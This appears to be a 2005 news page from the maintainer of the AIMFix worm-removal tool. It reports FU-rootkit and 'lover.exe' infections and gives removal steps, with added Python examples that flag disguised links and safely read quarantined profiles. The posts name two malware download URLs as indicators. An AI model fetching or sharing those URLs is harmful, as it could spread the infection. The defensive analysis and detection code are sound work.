News Items

Dec 22, 2005 12:44PM

There have been several new variations on the same rootkit mentioned in the past couple of news items. If you run into an infecting link, please let me know ASAP, so that I can grab a copy of the infecting file. These files help me build a library of malware, can be used to perform analysis, and are often critical in any investigation into the perpetrators. Be sure to send the actual file link - many of these links are disguised as a link to myspace, but in reality link to a completely different file on a different website.

-Jay
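The disguised links described above can be spotted mechanically: the visible text of the anchor names one site while the href points at a different host, and the target is often an executable. The following Python is an added example for readers, not code from AIMFix or this site; the HTML fragment, the documentation-range IP address and the file names in it are constructed, and the "registrable domain" comparison is a deliberately crude last-two-labels heuristic.

```python
"""Flag anchors whose visible text advertises one site while the href goes elsewhere.

Added example (not part of AIMFix). Sample input below is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Something that looks like a hostname inside the link's visible text.
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.IGNORECASE)
# Download targets worth a second look regardless of the text.
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".pif", ".com", ".bat")


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML fragment."""

    def __init__(self):
        super().__init__()
        self._href = None
        self._text = []
        self.anchors = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def _registrable(host):
    """Crude site comparison: keep the last two labels (www.myspace.com -> myspace.com)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def find_disguised_links(html):
    """Return one finding per anchor whose text names a site other than the href host,
    or whose href fetches an executable. Each finding lists its reasons."""
    collector = AnchorCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for href, text in collector.anchors:
        parsed = urlparse(href)
        target_host = parsed.hostname or ""
        reasons = []
        advertised = HOST_RE.search(text)
        if advertised and target_host and \
                _registrable(advertised.group(1)) != _registrable(target_host):
            reasons.append(f"text names {advertised.group(1)} but href goes to {target_host}")
        if parsed.path.lower().endswith(EXECUTABLE_SUFFIXES):
            reasons.append("href downloads an executable")
        if reasons:
            findings.append({"text": text, "href": href, "reasons": reasons})
    return findings


# Constructed sample: a message body with one disguised link, one honest link, one plain link.
SAMPLE_HTML = """
<p>check out my pics <a href="http://203.0.113.7/pics.exe">http://www.myspace.com/mypics</a></p>
<p>real link: <a href="http://www.myspace.com/someone">www.myspace.com/someone</a></p>
<p><a href="http://example.net/about">About this site</a></p>
"""

if __name__ == "__main__":
    for finding in find_disguised_links(SAMPLE_HTML):
        print(finding["href"], "<-", finding["text"], ";", "; ".join(finding["reasons"]))
```

Only the first anchor is reported, with both reasons: its text claims myspace.com while the href resolves to a bare IP address, and the path ends in .exe. A link whose text and href agree is left alone even when the text contains a hostname.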

Dec 12, 2005 10:51PM

AIMFix has been updated to handle the previously mentioned items. If you run the current version of AIMFix and it detects a known variant of the FU rootkit and/or the "lover.exe" virus, AIMFix will remove as much as possible, and set itself to run at startup the next time the computer reboots.

AIMFix should run if you reboot into Safe Mode or regular mode, and it will remove any remaining components possible. There were also some minor updates to logging and the profile cleaning. From now on if AIMFix removes a file, it will back up your existing profile to the aimfix_quarantine directory. You can use the quarantined profile to restore old information.

Quarantined profiles will be named in the following format: nnnn_info.htm.bak - where nnnn is any random number. ONLY quarantine files with "info.htm.bak" are profiles. Any other file is a suspected virus file. It is recommended that you open the backed-up profile in notepad or wordpad and copy the information, in case there is any malicious code embedded in the html of the profile.

-Jay
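Two pieces of the quarantine handling above lend themselves to a small script: separating profile backups from suspected virus files by the documented nnnn_info.htm.bak naming, and recovering the text of a backed-up profile without ever rendering its HTML (the same goal as opening it in notepad and copying the information out). The Python below is an added example for readers and is not AIMFix's own code; the quarantine directory, file names and profile contents it builds are constructed, and the IP address in the embedded script is from the documentation range.

```python
"""Sort an aimfix_quarantine directory by the documented naming convention and pull the
plain text out of a backed-up profile without rendering its HTML.

Added example (not part of AIMFix). demo() builds a constructed quarantine directory.
"""
import os
import re
import tempfile
from html.parser import HTMLParser

# Documented pattern: nnnn_info.htm.bak, where nnnn is a random number.
PROFILE_BACKUP_RE = re.compile(r"^\d+_info\.htm\.bak$", re.IGNORECASE)


def classify_quarantine(quarantine_dir):
    """Split entries into profile backups and everything else (treated as suspected virus files)."""
    profiles, suspects = [], []
    for name in sorted(os.listdir(quarantine_dir)):
        (profiles if PROFILE_BACKUP_RE.match(name) else suspects).append(name)
    return profiles, suspects


class TextOnly(HTMLParser):
    """Keep character data, drop all markup, and skip <script>/<style> bodies entirely."""

    SKIP = {"script", "style"}

    def __init__(self):
        super().__init__()
        self._skip_depth = 0
        self.chunks = []
        self.scripts_seen = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1
            if tag == "script":
                self.scripts_seen += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        # Script/style contents arrive here too; the depth counter drops them.
        if not self._skip_depth and data.strip():
            self.chunks.append(data.strip())


def profile_text(path):
    """Return (plain text, number of script blocks dropped) for a quarantined profile."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        parser = TextOnly()
        parser.feed(fh.read())
        parser.close()
    return "\n".join(parser.chunks), parser.scripts_seen


def demo():
    """Build a constructed quarantine directory and run both steps over it."""
    with tempfile.TemporaryDirectory() as qdir:
        with open(os.path.join(qdir, "4821_info.htm.bak"), "w", encoding="utf-8") as fh:
            fh.write("<html><body><h1>My Profile</h1><p>Away: at lunch</p>"
                     "<script>window.open('http://203.0.113.7/x.exe')</script></body></html>")
        open(os.path.join(qdir, "lover.exe"), "wb").close()   # constructed suspect
        open(os.path.join(qdir, "notes.txt"), "w").close()    # constructed suspect
        profiles, suspects = classify_quarantine(qdir)
        text, dropped = profile_text(os.path.join(qdir, profiles[0]))
        return {"profiles": profiles, "suspects": suspects,
                "text": text, "scripts_dropped": dropped}


if __name__ == "__main__":
    print(demo())
```

Anything in the directory that does not match the profile pattern is treated as a suspect, which matches the rule that only info.htm.bak files are profiles. The text extractor never executes or renders the backup, so any script a worm planted in the profile HTML is simply counted and discarded.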

Dec 09, 2005 09:02PM

Well, I have good news, and more good news. First, I just want to say a big thank you to Chris for buying me "Rootkits: Subverting the Windows Kernel" from my Amazon wishlist. That will be very helpful in understanding the new types of malware that are becoming prevalent.

Secondly, I have an update on the infosmartme.com infection I mentioned in my previous post. There is a new url being used in addition to the first url: http://69.64.48.229/lover.exe

I have also been able to verify that AIMFix will in fact detect and remove this virus, but it's slightly more involved than most virus/worm variants. The required steps to remove this virus appear to be:

  1. Run AIMFix - it should remove a few files and registry keys
  2. Reboot the computer immediately
  3. Run AIMFix a second time

More research will be done and I will be adding some special code to AIMFix soon to handle this variant, but as far as I can tell so far, the above steps will work.

-Jay

Dec 09, 2005 10:47AM

There is a new virus being spread from http://infosmartme.com/lover.exe

I have contacted the owners of the site and I've been doing my best to analyze the virus file. It appears to contain a variant of the FU Rootkit again, similar to the lockx.exe fiasco of a few weeks ago. I do not have an update available for AIMFix yet for this particular worm due to the rootkit nature of it.

I may or may not be able to come up with a solution for this item, but it is likely to take some time for me to research removal of the rootkit and see what needs to be done. If you are infected by this virus, the best advice as always is to reformat the computer completely.

I will post any updates to the situation here as they happen.

-Jay

Dec 07, 2005 11:43AM

A reader sent me a link to an interesting article - it looks like the two main virus variants I've been removing for the past few days have made the news.

-Jay
